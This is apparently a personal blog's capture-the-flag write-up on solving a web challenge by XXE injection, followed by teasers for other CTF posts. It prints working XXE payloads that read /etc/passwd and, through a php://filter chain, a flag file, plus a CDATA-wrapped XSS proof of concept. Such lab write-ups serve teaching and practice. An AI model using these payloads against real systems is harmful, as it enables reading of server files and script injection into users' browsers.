2019 Stonecutters - Fink Does Yoga

-
The "Fink Does Yoga" website was a very basic login form to schedule a yoga class. No matter what you entered as credentials, the username was reflected back to the user on the next page that loaded and the password given didn't really seem to matter. I started this challenge fuzzing bad characters to find some kind of injection vulnerability.

I found that entering a "<" as the username gave me an interesting error. Seen below is the complete response:

Warning: DOMDocument::loadXML(): StartTag: invalid element name in Entity, line: 1 in /app/web/login.php on line 22

Warning: simplexml_import_dom(): Invalid Nodetype to import in /app/web/login.php on line 24
Hi there, ! Welcome back.
Calendar
No spots are available at the moment. Please check back later. 

I noticed XML errors in this output so I tried the following XXE injection attack against the username field:

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

The response to this test was the following:

Getting tricky, eh? I'm super smart and blocked you. This is why you can't have nice things. #BlacklistFTW

I stepped through the XXE attack by first entering <?xml as the username, then <?xml version until I found that the string "file://" was blacklisted. 

While I found that I could use entity and php:// in the attack, the web app gave me a bunch of errors helping me correctly format what I needed to request.

Eventually, I had what I believed to be a correctly formatted attack but I kept getting an error about extra content at the end of the document in entity, or something along those lines.

At this point I begged @ranger_cha to help me out because something wasn't clicking for me and she asked me why I wasn't using burp, which to this day I have no idea why I wasn't. . .In her immortal words "make the request your bitch!"  ...or something along those lines :D 

So, I ended up looking at the request in burp and found that when I submitted the request there were tags added to the request data that were throwing off my attack. I sent the request to repeater and removed the extra tags so my request now looked like:

data=<!DOCTYPE root [ <!ENTITY strupo SYSTEM "php://filter/read=bzip2.compress/read=convert.base64-encode/resource=/flag.txt">]><userLogin><userName>&strupo;</userName><userPass></userPass></userLogin> 

The webserver then responded with:

<b>Warning</b>:  DOMDocument::loadXML(): unable to locate filter &quot;bzip2.compress&quot; in <b>/app/web/login.php</b> on line <b>22</b><br />
<br />
<b>Warning</b>:  DOMDocument::loadXML(): Unable to create filter (bzip2.compress) in <b>/app/web/login.php</b> on line <b>22</b><br />
Hi there,ZmxhZ3tJRWF0RE9OVVRTJlhYRUZvckJyZWFrZmFzdH0=! Welcome back. 

I base64 decoded the string for the flag: 

flag{IEatDONUTS&XXEForBreakfast}

Along the way to solving this challenge, I also found an XSS vulnerability by using CDATA to open and close the tags. I'm not sure that they are necessary in every single tag or just the <script> tags, but I figured I'd share the PoC anyway:

<![CDATA[<]]>userLogin<![CDATA[>]]><![CDATA[<]]>userName<![CDATA[>]]><![CDATA[<]]>script<![CDATA[>]]>alert(1);<![CDATA[<]]>/script<![CDATA[>]]><![CDATA[<]]>/userName<![CDATA[>]]><![CDATA[<]]>userPass<![CDATA[>]]><![CDATA[<]]>/userPass<![CDATA[>]]><![CDATA[<]]>/userLogin<![CDATA[>]]>

XSS

Honestly, this was my first time messing around with XXE. Another reason why I love CTFs. I know people have said that CTFs are not "real hacking" but sometimes they kind of are.

-strupo_

Popular posts from this blog

The Audacity of Some CTFs

-
Image
2021 Update : This is currently the most read post on our blog. Chances are that you are here because you are working on an audio challenge. If you see something looking like a digital signal, be sure to also check out our Radioactive Man write-up. I have stumbled across a few audio files while competing in CTFs over the last few years and I thought covering spectrograms would make a nice and quick blog post. Flags can manifest themselves in many ways when dealing with media files. One of the most common ways I have seen is by hiding them, or clues to find them, in the file's audio spectrogram. According to wikipedia: "a spectrogram is a visual representation of the spectrum of frequencies of sound, or other signals, as they vary with time." Basically, it is a method to visualize sound and signals. I first learned that you can embed hidden messages and images in a spectrogram when a friend showed me an image from an Aphex Twin song some years ago. Equation by
Read more

Code Name: Treehouse of Horror CTF

-
Image
A friend of mine asked me if I wanted to participate, on the sly, in an internal CTF that he put together for his employer. My score wouldn't be shown, and for all intents and purposes I did not compete. I figured I'd give it a code name incase I need to refer to this event. Let's call it the Treehouse of Horror CTF. The Treehouse of Horror CTF! The scoreboard appeared to be similar to the one used at the Defcon 26 IoT CTF, however this one was organized by challenge which made things nice for tracking your own progress versus one huge board of challenges.  I think this is called Jeopardy style. There were some odd moments at times because different challenge groups shared a target, so you had to identify which flag went with which challenge. Really not that big of a deal and I actually really enjoyed the format rather than just a single submit field like at derby or Eversec's CTF as it helped me track my progress with ease. The challenges were: FreePBX Re
Read more

2020 HTH CTF - Cloud Challenges

-
Image
Last weekend, @strupo_ joined team NiSec to participate in the HTH 2020 CTF  and together they got on the podium in third place! 2020 HTH CTF - Final Scoreboard The challenge categories included:  Cloud Crypto Forensics Kali 101  Misc Pwnables Recon Reverse Engineering Steganography Web Recently, strupo_ was fortunate enough to remotely attend  Breaching the Cloud Perimeter w/Beau Bullock . As cloud testing is still very new to him, and this blog tends to focus on introductory concepts and challenges, we thought it would be appropriate to try and tackle all of the cloud challenges in this post. Okay, let's get into it. The Cloud category had three challenges: BucketList (100) OhSnap! (150) Serving Less (250) BucketList Hey guys! I set up an AWS bucket for this year's hth that we can use to store our flags for the ctf. I think I made the bucket private but I'm not very good at this cloud stuff. Send me a message if I need to edit the permissions. Hint: Let's keep a flag
Read more